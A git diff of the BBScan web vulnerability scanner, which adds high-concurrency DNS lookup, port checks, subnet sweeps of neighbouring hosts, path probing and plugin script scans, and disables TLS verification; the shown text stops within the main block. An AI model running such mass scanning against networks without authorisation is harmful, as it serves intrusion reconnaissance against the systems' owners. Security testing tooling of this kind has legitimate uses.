diff --git a/.gitignore b/.gitignore
index 700bf6f..61570c1 100644
--- a/.gitignore
+++ b/.gitignore
@@ -2,8 +2,8 @@
__pycache__/
*.py[cod]
-# C extensions
-*.so
+tests/
+temp/
# Distribution / packaging
.Python
diff --git a/BBScan.py b/BBScan.py
index 2f9f220..16cb279 100644
--- a/BBScan.py
+++ b/BBScan.py
@@ -1,51 +1,43 @@
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
-# A vulnerability scanner focus on scanning large number of targets in short time with a minimal set of rules.
-# LiJieJie my[at]lijiejie.com http://www.lijiejie.com
+# A fast vulnerability scanner
+# A simple script scan of a class B network (65534 hosts) can finish within 2 minutes
+# LiJieJie my[at]lijiejie.com http://www.lijiejie.com
import Queue
-import logging
import re
import threading
from bs4 import BeautifulSoup
import multiprocessing
import time
-from string import Template
import glob
import ipaddress
import os
-import webbrowser
import socket
-import sys
import ssl
-import codecs
import traceback
-import struct
import importlib
import signal
-from lib.common import parse_url, decode_response_text, cal_depth, get_domain_sub, escape
+import requests
+import urllib3
+import urlparse
+import gevent
+from gevent import socket as g_socket
+from lib.common import clear_queue, parse_url, decode_response_text, cal_depth, get_domain_sub, \
+ is_port_open, scan_given_ports
from lib.cmdline import parse_args
-from lib.report import template
+from lib.report import save_report
from lib.connectionPool import HTTPConnPool, HTTPSConnPool
+from lib import config
+
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
-socket.setdefaulttimeout(30)
-
-USER_AGENT = 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 BBScan/1.4'
-HEADERS = {'User-Agent': USER_AGENT, 'Connection': 'Keep-Alive', 'Range': 'bytes=0-102400'}
-
-
-# print msg with multi-process shared lock
-def print_msg(msg):
- global_lock.acquire()
- print '[%s] %s' % (time.strftime('%H:%M:%S', time.localtime()), msg)
- global_lock.release()
-
class Scanner(object):
- def __init__(self, timeout=600, args=None):
+ def __init__(self, q_results, timeout=600, args=None):
+ self.q_results = q_results
self.args = args
self.start_time = time.time()
self.time_out = timeout
@@ -55,8 +47,8 @@ def __init__(self, timeout=600, args=None):
self._init_scripts()
self.url_queue = Queue.Queue() # all urls to scan
- self.urls_processed = set() # processed urls
- self.urls_enqueued = set() # entered queue urls
+ self.urls_processed = set() # processed urls
+ self.urls_enqueued = set() # entered queue urls
self.urls_crawled = set()
self.lock = threading.Lock()
@@ -65,14 +57,20 @@ def __init__(self, timeout=600, args=None):
self._404_status = -1
self.conn_pool = None
self.index_status, self.index_headers, self.index_html_doc = None, {}, ''
- self.url = ''
- self.schema, self.host, self.port, self.path = None, None, None, None
- self.domain_sub = self.base_url = ''
- self.has_status_404 = True
+ self.scheme, self.host, self.port, self.path = None, None, None, None
+ self.domain_sub = ''
+ self.base_url = ''
self.max_depth = 0
self.len_404_doc = 0
+ self.has_http = None
+ self.ports_open = None
+ self.ports_closed = None
+ self.no_scripts = None
+ self.status_502_count = 0
+
+ def print_msg(self, msg):
+ self.q_results.put(msg)
- # reset scanner
def reset_scanner(self):
self.start_time = time.time()
self.url_queue.queue.clear()
@@ -84,105 +82,110 @@ def reset_scanner(self):
self._404_status = -1
self.conn_pool = None
self.index_status, self.index_headers, self.index_html_doc = None, {}, ''
+ self.scheme, self.host, self.port, self.path = None, None, None, None
+ self.domain_sub = ''
+ self.base_url = ''
+ self.status_502_count = 0
# scan from a given URL
- def init_from_url(self, url):
+ def init_from_url(self, target):
self.reset_scanner()
- self.url = 'http://' + url if url.find('://') < 0 else url
- self.schema, self.host, self.path = parse_url(url)
+ self.scheme = target['scheme']
+ self.host = target['host']
+ self.port = target['port']
+ self.path = target['path']
+ self.has_http = target['has_http']
+ self.ports_open = target['ports_open']
+ self.ports_closed = target['ports_closed']
+ self.no_scripts = target['no_scripts'] if 'no_scripts' in target else 0
self.domain_sub = get_domain_sub(self.host)
self.init_final()
+ return True
def init_from_log_file(self, log_file):
self.reset_scanner()
self.log_file = log_file
- self.schema, self.host, self.path = self._parse_url_from_file()
+ self.scheme, self.host, self.path = self._parse_url_from_file()
self.domain_sub = get_domain_sub(self.host)
if self.host:
- self.load_all_urls_from_log_file()
+ if self.host.find(':') > 0:
+ _ret = self.host.split(':')
+ self.host = _ret[0]
+ self.port = _ret[1]
+ elif self.scheme == 'https':
+ self.port = 443
+ elif self.scheme == 'http':
+ self.port = 80
+ else:
+ self.port = None
+ if not is_port_open(self.host, self.port):
+ self.print_msg('[Port Not Open] %s:%s' % (self.host, self.port))
+ return False
+ self.has_http = True
+ self.no_scripts = 1
self.init_final()
+ self.load_all_urls_from_log_file()
return True
else:
host = os.path.basename(log_file).replace('.log', '')
try:
socket.gethostbyname(host)
- self.init_from_url(host)
+ self.init_from_url(host)  # FIXME: init_from_url now expects a target dict, not a host string
return True
except Exception as e:
- print_msg('[ERROR] Invalid host from log name: %s' % host)
+ self.print_msg('[ERROR] Invalid host from log name: %s' % host)
return False
- #
def init_final(self):
try:
if self.conn_pool:
self.conn_pool.close()
except Exception as e:
pass
- default_port = 443 if self.schema.lower() == 'https' else 80
- self.host, self.port = self.host.split(':') if self.host.find(':') > 0 else (self.host, default_port)
- self.port = int(self.port)
- if self.schema == 'http' and self.port == 80 or self.schema == 'https' and self.port == 443:
- self.base_url = '%s://%s' % (self.schema, self.host)
+
+ if self.scheme == 'http' and self.port == 80 or self.scheme == 'https' and self.port == 443:
+ self.base_url = '%s://%s' % (self.scheme, self.host)
else:
- self.base_url = '%s://%s:%s' % (self.schema, self.host, self.port)
+ self.base_url = '%s://%s:%s' % (self.scheme, self.host, self.port)
- is_port_open = self.is_port_open()
- if is_port_open:
- if self.schema == 'https':
- self.conn_pool = HTTPSConnPool(self.host, port=self.port, maxsize=self.args.t * 2, headers=HEADERS)
- else:
- self.conn_pool = HTTPConnPool(self.host, port=self.port, maxsize=self.args.t * 2, headers=HEADERS)
- # 301 redirect to https
- status, headers, html_doc = self.http_request('/')
- location = headers.get('Location', '')
- if status == 301 and location.startswith('https://'):
- self.base_url = location.rstrip('/')
- _, loc_host, _ = parse_url(location)
- port = int(loc_host.split(':')[1]) if loc_host.find(':') > 0 else 443
- self.conn_pool = HTTPSConnPool(self.host, port=port, maxsize=self.args.t * 2, headers=HEADERS)
- print_msg('301 redirect: %s' % location)
-
- if self.args.scripts_only or (not is_port_open and not self.args.no_scripts):
- for _ in self.user_scripts:
- self.url_queue.put((_, '/'))
- print_msg('Scan with scripts: %s' % self.host)
- return
+ if self.has_http:
+ self.print_msg('Scan %s' % self.base_url)
+ else:
+ self.print_msg('Scan %s:%s' % (self.host, self.port) if self.port else 'Scan %s' % self.host)
- if not is_port_open:
+ if self.has_http:
+ if self.scheme == 'https':
+ self.conn_pool = HTTPSConnPool(self.host, port=self.port, maxsize=self.args.t,
+ headers=config.default_headers)
+ else:
+ self.conn_pool = HTTPConnPool(self.host, port=self.port, maxsize=self.args.t,
+ headers=config.default_headers)
+ if self.args.require_index_doc:
+ self.crawl('/', do_not_process_links=True)
+
+ if self.no_scripts != 1:  # not a duplicate target created by an 80 -> 443 redirect; no need to scan it twice
+ # scripts-only mode, or scripts enabled for this target
+ if self.args.scripts_only or not self.no_scripts:
+ for _ in self.user_scripts:
+ self.url_queue.put((_, '/'))
+
+ if not self.has_http or self.args.scripts_only:  # no HTTP service found, or scripts-only scan
return
self.max_depth = cal_depth(self, self.path)[1] + 5
if self.args.no_check404:
self._404_status = 404
- self.has_status_404 = True
else:
self.check_404_existence()
if self._404_status == -1:
- print_msg('[Warning] HTTP 404 check failed <%s:%s>' % (self.host, self.port))
- elif not self.has_status_404:
- print_msg('[Warning] %s has no HTTP 404.' % self.base_url)
+ self.print_msg('[Warning] HTTP 404 check failed <%s:%s>' % (self.host, self.port))
+ elif self._404_status != 404:
+ self.print_msg('[Warning] %s has no HTTP 404.' % self.base_url)
_path, _depth = cal_depth(self, self.path)
- self.enqueue('/')
- self.enqueue(_path)
- if not self.args.no_crawl and not self.log_file:
- self.crawl(_path)
- def is_port_open(self):
- try:
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(5.0)
- if s.connect_ex((self.host, int(self.port))) == 0:
- print_msg('scan web: %s:%s' % (self.host, self.port))
- return True
- else:
- print_msg('[Warning] Fail to connect to %s' % self.base_url)
- return False
- except Exception as e:
- return False
- finally:
- s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
- s.close()
+ self.enqueue('/')
+ if _path != '/' and not self.log_file:
+ self.enqueue(_path)
#
def _parse_url_from_file(self):
@@ -195,7 +198,6 @@ def _parse_url_from_file(self):
break
return parse_url(url)
- #
# load urls from rules/*.txt
def _init_rules(self):
self.text_to_find = []
@@ -210,7 +212,9 @@ def _init_rules(self):
p_content_type = re.compile('{type="(.*?)"}')
p_content_type_no = re.compile('{type_no="(.*?)"}')
- for rule_file in glob.glob('rules/*.txt'):
+ _files = self.args.rule_files if self.args.rule_files else glob.glob('rules/*.txt')
+
+ for rule_file in _files:
with open(rule_file, 'r') as infile:
vul_type = os.path.basename(rule_file)[:-4]
for url in infile.xreadlines():
@@ -235,19 +239,19 @@ def _init_rules(self):
if rule not in self.rules_set_root_only:
self.rules_set_root_only.add(rule)
else:
- print_msg('Duplicated root only rule: %s' % str(rule))
+ self.print_msg('Duplicated root only rule: %s' % str(rule))
else:
if rule not in self.rules_set:
self.rules_set.add(rule)
else:
- print_msg('Duplicated rule: %s' % str(rule))
+ self.print_msg('Duplicated rule: %s' % str(rule))
re_text = re.compile('{text="(.*)"}')
re_regex_text = re.compile('{regex_text="(.*)"}')
file_path = 'rules/white.list'
if not os.path.exists(file_path):
- print_msg('[ERROR] File not exist: %s' % file_path)
+ self.print_msg('[ERROR] File not exist: %s' % file_path)
return
for _line in open(file_path):
_line = _line.strip()
@@ -263,7 +267,7 @@ def _init_rules(self):
file_path = 'rules/black.list'
if not os.path.exists(file_path):
- print_msg('[ERROR] File not exist: %s' % file_path)
+ self.print_msg('[ERROR] File not exist: %s' % file_path)
return
for _line in open(file_path):
_line = _line.strip()
@@ -277,29 +281,34 @@ def _init_rules(self):
if _m:
self.regex_to_exclude.append(re.compile(_m.group(1).decode('utf-8', 'ignore')))
- #
def _init_scripts(self):
self.user_scripts = []
- if self.args.no_scripts: # disable user scripts scan
+ if self.args.no_scripts:  # scripts disabled globally, nothing to import
return
for _script in glob.glob('scripts/*.py'):
- script_name = os.path.basename(_script).replace('.py', '')
+ script_name_origin = os.path.basename(_script)
+ script_name = script_name_origin.replace('.py', '')
+ if self.args.script:  # import only the specified scripts
+ if script_name not in self.args.script and script_name_origin not in self.args.script:
+ continue
if script_name.startswith('_'):
continue
try:
self.user_scripts.append(importlib.import_module('scripts.%s' % script_name))
except Exception as e:
- print_msg('[ERROR] Fail to load script %s' % script_name)
+ self.print_msg('[ERROR] Fail to load script %s' % script_name)
- #
- def http_request(self, url, headers=HEADERS, timeout=30):
+ def http_request(self, url, headers=config.default_headers, timeout=20):
try:
if not url:
url = '/'
- # print_msg('request %s' % self.base_url + url)
+ if not self.conn_pool:
+ return -1, {}, ''
+ if self.args.debug:
+ self.print_msg('--> %s' % self.base_url + url)
resp = self.conn_pool.urlopen('GET', self.base_url + url,
- headers=headers, redirect=False, timeout=timeout, retries=0)
- status = resp.status
+ headers=headers, assert_same_host=False,
+ redirect=False, timeout=timeout, retries=0)
if resp.headers.get('content-type', '').find('text') >= 0 \
or resp.headers.get('content-type', '').find('html') >= 0 \
or int(resp.headers.get('content-length', '0')) <= 20480: # 1024 * 20
@@ -307,37 +316,55 @@ def http_request(self, url, headers=HEADERS, timeout=30):
else:
html_doc = ''
- return status, resp.headers, html_doc
+ if resp.status == 502:  # exclude the site after more than three 502 responses
+ self.status_502_count += 1
+ if self.status_502_count > 3:
+ self.url_queue.queue.clear()
+ try:
+ if self.conn_pool:
+ self.conn_pool.close()
+ except Exception as e:
+ pass
+ self.conn_pool = None
+ # self.print_msg('Website 502: %s' % self.base_url)
+
+ return resp.status, resp.headers, html_doc
+ except urllib3.exceptions.MaxRetryError as e:
+ return -1, {}, ''
+ except TypeError as e:
+ return -1, {}, ''
except Exception as e:
+ self.print_msg(str(e))
return -1, {}, ''
- # check existence of HTTP 404
+ # check existence of status 404
def check_404_existence(self):
try:
try:
self._404_status, _, html_doc = self.http_request('/BBScan-404-existence-check')
except Exception as e:
- print_msg('[Warning] HTTP 404 check failed <%s:%s>' % (self.host, self.port))
+ self.print_msg('[Warning] HTTP 404 check failed: %s' % self.base_url)
self._404_status, _, html_doc = -1, {}, ''
- if self._404_status == 404:
- self.has_status_404 = True
- else:
- self.has_status_404 = False
+ if self._404_status != 404:
self.len_404_doc = len(html_doc)
except Exception as e:
- logging.error('[Check_404] Exception %s %s' % (self.base_url, str(e)))
+ self.print_msg('[Check_404] Exception %s %s' % (self.base_url, str(e)))
#
def enqueue(self, url):
try:
url = str(url)
+ except Exception as e:
+ return False
+ try:
url_pattern = re.sub(r'\d+', '{num}', url)
if url_pattern in self.urls_processed or len(self.urls_processed) >= self.links_limit:
return False
- else:
- self.urls_processed.add(url_pattern)
- # print_msg('Entered Queue: %s' % url)
- self.crawl(url)
+
+ self.urls_processed.add(url_pattern)
+ # self.print_msg('Entered Queue: %s' % url)
+ if not self.args.no_crawl: # no crawl
+ self.crawl(url)
if self._404_status != -1: # valid web service
rule_set_to_process = [self.rules_set, self.rules_set_root_only] if url == '/' else [self.rules_set]
for rule_set in rule_set_to_process:
@@ -358,32 +385,35 @@ def enqueue(self, url):
if self.args.full_scan and url.count('/') >= 2:
self.enqueue('/'.join(url.split('/')[:-2]) + '/') # sub folder enqueue
- for script in self.user_scripts:
- self.url_queue.put((script, url))
+ if url != '/' and not self.no_scripts:
+ for script in self.user_scripts:
+ self.url_queue.put((script, url))
return True
except Exception as e:
- print '[_enqueue.exception] %s' % str(e)
+ self.print_msg('[_enqueue.exception] %s' % str(e))
return False
#
- def crawl(self, path):
+ def crawl(self, path, do_not_process_links=False):
try:
- headers = dict(HEADERS, Range='bytes=0-204800') # allowed size increased to 200 kb
+ # increase body size to 200 KB
+ headers = dict(config.default_headers, Range='bytes=0-204800')
status, headers, html_doc = self.http_request(path, headers=headers)
if path == '/':
self.index_status, self.index_headers, self.index_html_doc = status, headers, html_doc
- if self.index_html_doc:
+ if not self.args.no_crawl and not do_not_process_links and html_doc:
soup = BeautifulSoup(html_doc, "html.parser")
for link in soup.find_all('a'):
url = link.get('href', '').strip()
if url.startswith('..'):
continue
- if not url.startswith('/') and url.find('//') < 0:
+ if not url.startswith('/') and url.find('//') < 0: # relative path
url = path + url
url, depth = cal_depth(self, url)
# print url, depth
if depth <= self.max_depth:
self.enqueue(url)
+ #
ret = self.find_text(html_doc)
if ret:
if '/' not in self.results:
@@ -395,8 +425,7 @@ def crawl(self, path):
self.results['/'].append(_)
except Exception as e:
- print_msg('[crawl Exception] %s %s' % (path, str(e)))
- traceback.print_exc()
+ self.print_msg('[crawl Exception] %s %s' % (path, str(e)))
#
def load_all_urls_from_log_file(self):
@@ -408,7 +437,7 @@ def load_all_urls_from_log_file(self):
url, depth = cal_depth(self, _[1])
self.enqueue(url)
except Exception as e:
- print_msg('[load_all_urls_from_log_file] %s' % str(e))
+ self.print_msg('[load_all_urls_from_log_file] %s' % str(e))
#
def find_text(self, html_doc):
@@ -432,10 +461,10 @@ def find_exclude_text(self, html_doc):
#
def scan_worker(self):
- while self.url_queue.qsize() > 0:
+ while True:
if time.time() - self.start_time > self.time_out:
self.url_queue.queue.clear()
- print_msg('[ERROR] Timed out task: %s' % self.base_url)
+ self.print_msg('[ERROR] Timed out task: %s' % self.base_url)
return
try:
item = self.url_queue.get(timeout=0.1)
@@ -444,9 +473,9 @@ def scan_worker(self):
try:
if len(item) == 2: # Script Scan
check_func = getattr(item[0], 'do_check')
- # print_msg('Begin %s %s' % (os.path.basename(item[0].__file__), item[1]))
+ # self.print_msg('Begin %s %s' % (os.path.basename(item[0].__file__), item[1]))
check_func(self, item[1])
- # print_msg('End %s %s' % (os.path.basename(item[0].__file__), item[1]))
+ # self.print_msg('End %s %s' % (os.path.basename(item[0].__file__), item[1]))
continue
else:
url_description, tag, status_to_match, content_type, content_type_no, root_only, vul_type = item
@@ -459,13 +488,12 @@ def scan_worker(self):
url = url.replace('{sub}', self.domain_sub)
except Exception as e:
- print_msg('[scan_worker.1] %s' % str(e))
- traceback.print_exc()
+ self.print_msg('[scan_worker.1] %s' % str(e))
+ self.print_msg(traceback.format_exc())
continue
if not item or not url:
break
- # print_msg('[%s]' % url.strip())
try:
status, headers, html_doc = self.http_request(url)
cur_content_type = headers.get('content-type', '')
@@ -516,7 +544,7 @@ def scan_worker(self):
m = re.search('<title>(.*?)</title>', html_doc)
title = m.group(1) if m else ''
self.lock.acquire()
- # print '[+] [Prefix:%s] [%s] %s' % (prefix, status, 'http://' + self.host + url)
+ # self.print_msg('[+] [Prefix:%s] [%s] %s' % (prefix, status, 'http://' + self.host + url))
if prefix not in self.results:
self.results[prefix] = []
_ = {'status': status, 'url': '%s%s' % (self.base_url, url), 'title': title, 'vul_type': vul_type}
@@ -524,7 +552,7 @@ def scan_worker(self):
self.results[prefix].append(_)
self.lock.release()
except Exception as e:
- print_msg('[scan_worker.2][%s] %s' % (url, str(e)))
+ self.print_msg('[scan_worker.2][%s] %s' % (url, str(e)))
traceback.print_exc()
#
@@ -539,228 +567,360 @@ def scan(self, threads=6):
t.join()
for key in self.results.keys():
- if len(self.results[key]) > 5: # Over 5 URLs found under this folder, show first only
+ # Over 5 URLs found under this folder, keep the first one only
+ if len(self.results[key]) > 5:
self.results[key] = self.results[key][:1]
- return self.host, self.results
+ return self.base_url.replace('unknown://', '').replace(':None', ''), self.results  # strip placeholder scheme / port
except Exception as e:
- print '[scan exception] %s' % str(e)
+ self.print_msg('[scan exception] %s' % str(e))
self.conn_pool.close()
-def exit_func(sig, frame):
+def exit_func(_sig, _frame):
exit(-1)
-def scan_process(q_targets, q_results, lock, args, target_process_done):
+def scan_process(q_targets, q_results, args, target_process_done):
+ reload(socket)
signal.signal(signal.SIGINT, exit_func)
- try:
- __builtins__['global_lock'] = lock
- except Exception as e:
- pass
- try:
- setattr(__builtins__, 'global_lock', lock)
- except Exception as e:
- pass
-
- s = Scanner(args.timeout * 60, args=args)
+ s = Scanner(q_results, args.timeout * 60, args=args)
while True:
try:
- target = q_targets.get(timeout=0.5)
+ target = q_targets.get(timeout=0.2)
except Exception as e:
if target_process_done.value:
break
else:
continue
- if target['url']:
- s.init_from_url(target['url'])
+ if 'target' in target:
+ ret = s.init_from_url(target['target'])
+ elif 'file' in target:
+ ret = s.init_from_log_file(target['file'])
else:
- s.init_from_log_file(target['file'])
-
- host, results = s.scan(threads=args.t)
- if results:
- q_results.put((host, results))
- lock.acquire()
- for key in results.keys():
- for url in results[key]:
- print ' [+]%s %s' % (' [%s]' % url['status'] if url['status'] else '', url['url'])
- lock.release()
-
-
-def save_report(_q_results, _file):
- start_time = time.time()
-
- a_template = template['markdown'] if args.md else template['html']
- t_general = Template(a_template['general'])
- t_host = Template(a_template['host'])
- t_list_item = Template(a_template['list_item'])
- output_file_suffix = a_template['suffix']
- report_name = '%s_%s%s' % (os.path.basename(_file).lower().replace('.txt', ''),
- time.strftime('%Y%m%d_%H%M%S', time.localtime()),
- output_file_suffix)
-
- html_doc = content = ""
- global STOP_ME
- try:
- while not STOP_ME:
- if _q_results.qsize() == 0:
- time.sleep(0.5)
- continue
-
- while _q_results.qsize() > 0:
- host, results = _q_results.get()
- _str = ""
- for key in results.keys():
- for _ in results[key]:
- _str += t_list_item.substitute(
- {'status': ' [%s]' % _['status'] if _['status'] else '',
- 'url': _['url'],
- 'title': '[%s]' % _['title'] if _['title'] else '',
- 'vul_type': escape(_['vul_type'].replace('_', ' ')) if 'vul_type' in _ else ''}
- )
- _str = t_host.substitute({'host': host, 'list': _str})
- content += _str
+ continue
+
+ if ret:
+ host, results = s.scan(threads=args.t)
+ if results:
+ q_results.put((host, results))
+
+
+def add_target(q_targets, q_results, target, tasks_count, args, is_neighbor=False):
+ if is_neighbor:
+ target['no_scripts'] = 2  # neighbor IP: scripts disabled
+ # if args.debug:
+ # q_results.put('New target: %s' % target)
+ q_targets.put({'target': target})
+ if args.save_ports and target['ports_open']:
+ config.ports_saved_to_file = True
+ if not args.ports_file:
+ args.ports_file = open(args.save_ports, 'w')
+ for port in target['ports_open']:
+ args.ports_file.write('%s:%s\n' % (target['host'], port))
+ args.ports_file.flush()
+ tasks_count.value += 1
+
+
+def domain_lookup_check(queue_targets_origin, processed_targets, queue_targets, q_results):
+ """
+ Resolve domain names and check their validity
+ """
+ while True:
+ try:
+ url = queue_targets_origin.get_nowait()
+ except Queue.Empty as e:
+ break
+ # scheme netloc path
+ if url.find('://') < 0:
+ netloc = url[:url.find('/')] if url.find('/') > 0 else url
+ else:
+ scheme, netloc, path, params, query, fragment = urlparse.urlparse(url, 'http')
- cost_time = time.time() - start_time
- cost_min = int(cost_time / 60)
- cost_min = '%s min' % cost_min if cost_min > 0 else ''
- cost_seconds = '%.2f' % (cost_time % 60)
- html_doc = t_general.substitute(
- {'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': content}
- )
-
- with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
- outFile.write(html_doc)
-
- if html_doc:
- print_msg('Scan report saved to report/%s' % report_name)
- if not args.no_browser:
- webbrowser.open_new_tab(os.path.abspath('report/%s' % report_name))
+ # host port
+ if netloc.find(':') >= 0:
+ _ = netloc.split(':')
+ host = _[0]
else:
- print_msg('No vulnerabilities found on sites in %s.' % _file)
+ host = netloc
- except Exception as e:
- print_msg('[save_report_thread Exception] %s %s' % (type(e), str(e)))
- sys.exit(-1)
+ try:
+ ip = g_socket.gethostbyname(host)
+ processed_targets.append(ip)
+ queue_targets.put((url, 0))
+ except Exception as e:
+ q_results.put('Invalid domain: %s' % host)
-def domain_lookup():
+def port_scan_check(queue_targets, q_targets, args, q_results, tasks_count):
+ """
+ Check whether ports are open
+ no_scripts
+ -> null no restriction
+ -> 1 duplicate target, highest priority
+ -> 2 neighbor host, scripts disabled to save scan time
+ """
while True:
try:
- host = queue_hosts.get(timeout=0.1)
+ url, is_neighbor = queue_targets.get_nowait()
except Queue.Empty as e:
break
- _schema, _host, _path = parse_url(host)
try:
- m = re.search(r'\d+\.\d+\.\d+\.\d+', _host.split(':')[0])
- if m:
- q_targets.put({'file': '', 'url': host})
- ips_to_scan.append(m.group(0))
+ # scheme netloc path
+ if url.find('://') < 0:
+ scheme = 'unknown'
+ netloc = url[:url.find('/')] if url.find('/') > 0 else url
+ path = ''
+ else:
+ scheme, netloc, path, params, query, fragment = urlparse.urlparse(url, 'http')
+
+ # host port
+ if netloc.find(':') >= 0:
+ _ = netloc.split(':')
+ host = _[0]
+ port = int(_[1])
+ else:
+ host = netloc
+ port = None
+
+ if scheme == 'https' and port is None:
+ port = 443
+ elif scheme == 'http' and port is None:
+ port = 80
+
+ if scheme == 'unknown':
+ if port == 80:
+ scheme = 'http'
+ if port == 443:
+ scheme = 'https'
+
+ ports_open = set()
+ ports_closed = set()
+
+ # scripts do not rely on the HTTP connection pool & scripts-only scan: skip the HTTP check on ports 80/443
+ if args.scripts_only and args.require_no_http:
+ ports_open, ports_closed = scan_given_ports(ports_open, ports_closed, host, args.require_ports)
+ target = {'scheme': scheme, 'host': host, 'port': port, 'path': path,
+ 'has_http': False, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args)
+ continue
+
+ if port:
+ # standard or non-standard port
+ has_http = is_port_open(host, port)
+ if has_http:
+ ports_open.add(port)
+ else:
+ ports_closed.add(port)
+ if not args.no_scripts:
+ ports_open, ports_closed = scan_given_ports(ports_open, ports_closed, host, args.require_ports)
+
+ target = {'scheme': scheme, 'host': host, 'port': port, 'path': path, 'has_http': has_http,
+ 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args)
+
else:
- ip = socket.gethostbyname(_host.split(':')[0])
- q_targets.put({'file': '', 'url': host})
- ips_to_scan.append(ip)
+ port_open_80 = is_port_open(host, 80)
+ port_open_443 = is_port_open(host, 443)
+ if port_open_80:
+ ports_open.add(80)
+ else:
+ ports_closed.add(80)
+ if port_open_443:
+ ports_open.add(443)
+ else:
+ ports_closed.add(443)
+ if not args.no_scripts:
+ ports_open, ports_closed = scan_given_ports(ports_open, ports_closed, host, args.require_ports)
+
+ if port_open_80 and port_open_443:
+ target = {'scheme': 'https', 'host': host, 'port': 443, 'path': path,
+ 'has_http': True, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args, is_neighbor)
+ # exclude hosts whose HTTP service 301-redirects to HTTPS
+ import grequests
+ r = grequests.map([grequests.get('http://%s' % host, allow_redirects=False, timeout=20)])[0]
+ if r and not (r.status_code == 301 and r.headers.get('Location', '').lower().startswith('https')):
+ target = {'scheme': 'http', 'host': host, 'port': 80, 'path': path,
+ 'has_http': True, 'no_scripts': 1,
+ 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args)
+
+ elif port_open_443:
+ target = {'scheme': 'https', 'host': host, 'port': 443, 'path': path,
+ 'has_http': True, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ # even if scripts are allowed for given targets, keep them disabled for neighbors to save scan time
+ add_target(q_targets, q_results, target, tasks_count, args, is_neighbor)
+ elif port_open_80:
+ target = {'scheme': 'http', 'host': host, 'port': 80, 'path': path,
+ 'has_http': True, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args, is_neighbor)
+ elif args.no_scripts:
+ # ports 80/443 are closed and scripts are disabled
+ q_results.put('No ports open: %s' % host)
+ elif not is_neighbor or args.scripts_only:
+ # target was given directly, or scripts are applied to neighbors
+ target = {'scheme': 'http', 'host': host, 'port': 80, 'path': path,
+ 'has_http': False, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args)
+
+ except requests.exceptions.RequestException as e:
+ pass
except Exception as e:
- print e
- print_msg('[Warning] Invalid domain <%s>' % _host.split(':')[0])
-
-
-def process_target():
- global target_process_done
- all_threads = []
- for _ in range(10):
- t = threading.Thread(target=domain_lookup)
- all_threads.append(t)
- t.start()
- for t in all_threads:
- t.join()
+ import traceback
+ q_results.put(traceback.format_exc())
+ q_results.put('[port_scan_check] %s' % str(e))
+
+
+def process_targets(q_targets, args, q_results, queue_targets, tasks_count):
+ # resolve domain names and scan ports with high concurrency
+ # these are short-lived tasks executed at high concurrency
+ # q_results.put('start %s' % time.time())
+ threads = [gevent.spawn(port_scan_check, queue_targets, q_targets, args,
+ q_results, tasks_count) for _ in range(1000)]
+ gevent.joinall(threads)
+ # q_results.put('end %s' % time.time())
+
+
+def prepare_targets(target_list, q_targets, q_results, args, tasks_count, process_targets_done):
+ """
+ Pre-process URLs / IPs / domain names, and do port discovery
+ """
+ from gevent.queue import Queue
+ queue_targets_origin = Queue()
+ for target in target_list:
+ if target.strip() and len(target) > 5:
+ # work with https://github.com/lijiejie/subDomainsBrute
+ # Delimiter should be ","
+ hosts = target.replace(',', ' ').strip().split()
+ queue_targets_origin.put(hosts[0])
+
+ processed_targets = []
+ # splitting domain lookup from port scan saves about 2 seconds
+ # merging DNS lookup and port scan into one function would be simpler, but would cost those 2 seconds
+ q_results.put('Domain lookup start.')
+ queue_targets = Queue()
+ threads = [gevent.spawn(domain_lookup_check,
+ queue_targets_origin, processed_targets, queue_targets, q_results) for _ in range(500)]
+ gevent.joinall(threads)
+
if args.network != 32:
- for ip in ips_to_scan:
- if ip.find('/') > 0:
+ q_results.put('Process sub network start.')
+ num_entered_queue = 0
+ for ip in processed_targets:
+ if ip.find('/') > 0:  # the network itself has already been processed
continue
_network = u'%s/%s' % ('.'.join(ip.split('.')[:3]), args.network)
- if _network in ips_to_scan:
+ if _network in processed_targets:
continue
- ips_to_scan.append(_network)
- _ips = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()
- for _ip in _ips:
- _ip = str(_ip)
- if _ip not in ips_to_scan:
- ips_to_scan.append(_ip)
- q_targets.put({'file': '', 'url': _ip})
- target_process_done.value = 1
- print_msg('%s targets left to scan' % q_targets.qsize())
+ processed_targets.append(_network)
+
+ if args.network >= 20:
+ sub_nets = [ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()]
+ else:
+ sub_nets = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).subnets(new_prefix=22)
+ for sub_net in sub_nets:
+ if str(sub_net) in processed_targets:
+ continue
+ if type(sub_net) == ipaddress.IPv4Network: # add network only
+ processed_targets.append(str(sub_net))
+ for _ip in sub_net:
+ _ip = str(_ip)
+ if _ip not in processed_targets:
+ queue_targets.put((_ip, 1))
+ num_entered_queue += 1
+ if num_entered_queue > 65535:  # keep the queue short; if larger than a class B network, process in batches
+ process_targets(q_targets, args, q_results, queue_targets, tasks_count)
+ num_entered_queue = 0
+ if queue_targets.qsize() > 0:  # targets still left to process
+ process_targets(q_targets, args, q_results, queue_targets, tasks_count)
+ if args.save_ports and args.ports_file:
+ args.ports_file.close()
+ process_targets_done.value = 1  # target import finished
+ q_results.put('* All targets processed.')
if __name__ == '__main__':
args = parse_args()
- if args.f:
- input_files = [args.f]
- elif args.d:
- input_files = glob.glob(args.d + '/*.txt')
- elif args.crawler:
- input_files = ['crawler']
- elif args.host:
- input_files = ['hosts'] # several hosts from command line
-
